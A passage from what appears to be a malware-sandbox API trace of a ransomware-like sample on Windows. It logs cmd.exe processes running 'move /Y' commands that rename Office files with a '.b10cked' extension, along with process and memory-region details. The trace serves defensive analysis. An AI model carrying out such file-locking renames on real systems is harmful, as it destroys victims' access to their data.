lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x0, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x9, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x9, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x9, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.059] RegCloseKey (hKey=0x40) 
returned 0x0 [0158.059] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886380 [0158.059] srand (_Seed=0x5b886380) [0158.059] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"" [0158.059] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"" [0158.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.060] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.060] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.060] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.060] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.060] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.060] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.060] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.060] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.060] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.060] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.060] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.060] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.061] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.061] GetEnvironmentStringsW () returned 0x3b2360* [0158.061] FreeEnvironmentStringsW (penv=0x3b2360) returned 1 [0158.061] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.061] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.061] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.061] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.061] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.061] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.061] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.061] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.061] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.061] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efb90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.061] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efb90, lpFilePart=0x1efb8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efb8c*="Desktop") returned 0x18 [0158.062] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.062] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef90c | out: lpFindFileData=0x1ef90c) returned 0x3b09f0 [0158.062] FindClose (in: hFindFile=0x3b09f0 | out: hFindFile=0x3b09f0) returned 1 [0158.062] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef90c | out: lpFindFileData=0x1ef90c) returned 0x3b09f0 [0158.062] FindClose (in: 
hFindFile=0x3b09f0 | out: hFindFile=0x3b09f0) returned 1 [0158.062] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef90c | out: lpFindFileData=0x1ef90c) returned 0x3b09f0 [0158.062] FindClose (in: hFindFile=0x3b09f0 | out: hFindFile=0x3b09f0) returned 1 [0158.063] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.063] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.063] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.063] GetEnvironmentStringsW () returned 0x3b0210* [0158.063] FreeEnvironmentStringsW (penv=0x3b0210) returned 1 [0158.063] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.064] GetConsoleOutputCP () returned 0x1b5 [0158.089] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.089] GetUserDefaultLCID () returned 0x409 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efcd0, cchData=128 | out: lpLCData="0") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efcd0, cchData=128 | out: lpLCData="0") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efcd0, cchData=128 | out: lpLCData="1") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.091] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.092] GetConsoleTitleW (in: lpConsoleTitle=0x3a0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.092] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.093] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.093] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.093] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.093] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.093] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.093] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.093] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.093] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.093] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.097] GetConsoleTitleW (in: lpConsoleTitle=0x1ef9c8, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.097] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.097] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.098] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.098] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.098] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.098] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.098] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.098] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.098] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.098] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.098] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.098] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.098] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.098] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.098] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.098] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.098] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.098] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.098] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.098] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.098] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.098] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.098] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.098] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0158.098] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.098] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.098] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.098] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.098] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.099] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.101] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef784, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef77c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef77c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.102] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.102] _wcsicmp (_String1="PUB6IN~1.TRX", _String2=".") returned 66 [0158.103] _wcsicmp 
(_String1="PUB6IN~1.TRX", _String2="..") returned 66 [0158.103] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6in~1.trx")) returned 0x2020 [0158.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3b1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.103] SetErrorMode (uMode=0x0) returned 0x0 [0158.103] SetErrorMode (uMode=0x1) returned 0x0 [0158.103] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x1ef10c, lpFilePart=0x1ef0f4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", lpFilePart=0x1ef0f4*="PUB6IN~1.TRX") returned 0x3c [0158.103] SetErrorMode (uMode=0x0) returned 0x1 [0158.103] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.103] _wcsicmp (_String1="PUB6IN~1.TRX", _String2=".") returned 66 [0158.103] _wcsicmp (_String1="PUB6IN~1.TRX", _String2="..") returned 66 [0158.103] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6in~1.trx")) returned 0x2020 [0158.104] SetErrorMode (uMode=0x0) returned 0x0 [0158.104] SetErrorMode (uMode=0x1) returned 0x0 [0158.104] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x1ef588, lpFilePart=0x1ef320 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", lpFilePart=0x1ef320*="PUB6IN~1.TRX") returned 0x3c [0158.104] SetErrorMode (uMode=0x0) returned 0x1 [0158.104] SetErrorMode (uMode=0x0) returned 0x0 [0158.104] SetErrorMode (uMode=0x1) returned 0x0 [0158.104] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ef790, lpFilePart=0x1ef320 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked", lpFilePart=0x1ef320*="PUB6INTL.DLL.trx_dll.b10cked") returned 0x4c [0158.104] SetErrorMode (uMode=0x0) returned 0x1 [0158.104] SetLastError (dwErrCode=0x0) [0158.104] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.dll.trx_dll.b10cked")) returned 0xffffffff [0158.104] GetLastError () returned 0x2 [0158.104] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1eec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec9c) returned 0x3b2130 [0158.104] FindNextFileW (in: hFindFile=0x3b2130, lpFindFileData=0x1eec9c | out: lpFindFileData=0x1eec9c) returned 0 [0158.105] GetLastError () returned 0x12 [0158.105] FindClose (in: hFindFile=0x3b2130 | out: hFindFile=0x3b2130) returned 1 [0158.106] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3b1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b1cc0) returned 0x3b2130 [0158.107] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1eef34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0158.107] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1eef34, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0158.107] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.dll.trx_dll")) returned 0x2020 [0158.107] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6intl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.108] FindClose (in: hFindFile=0x3b2130 | out: hFindFile=0x3b2130) returned 1 [0158.108] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eeee8 | out: _Buffer=" 1") returned 9 [0158.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.108] GetFileType (hFile=0x7) returned 0x2 [0158.108] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.108] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eee74 | out: lpMode=0x1eee74) returned 1 [0158.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeea8 | out: lpConsoleScreenBufferInfo=0x1eeea8) returned 1 [0158.109] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.109] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeee8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.110] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x1eeecc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeecc*=0x1a) returned 1 [0158.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.113] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.113] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.114] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.114] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.114] SetConsoleInputExeNameW () returned 0x1 [0158.114] GetConsoleOutputCP () returned 0x1b5 [0158.114] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.114] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.114] exit (_Code=0) Process: id = "266" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xf5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21830 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21831 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21832 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21833 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 21834 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21835 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21836 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21837 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21838 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 21839 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21855 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21856 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21857 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
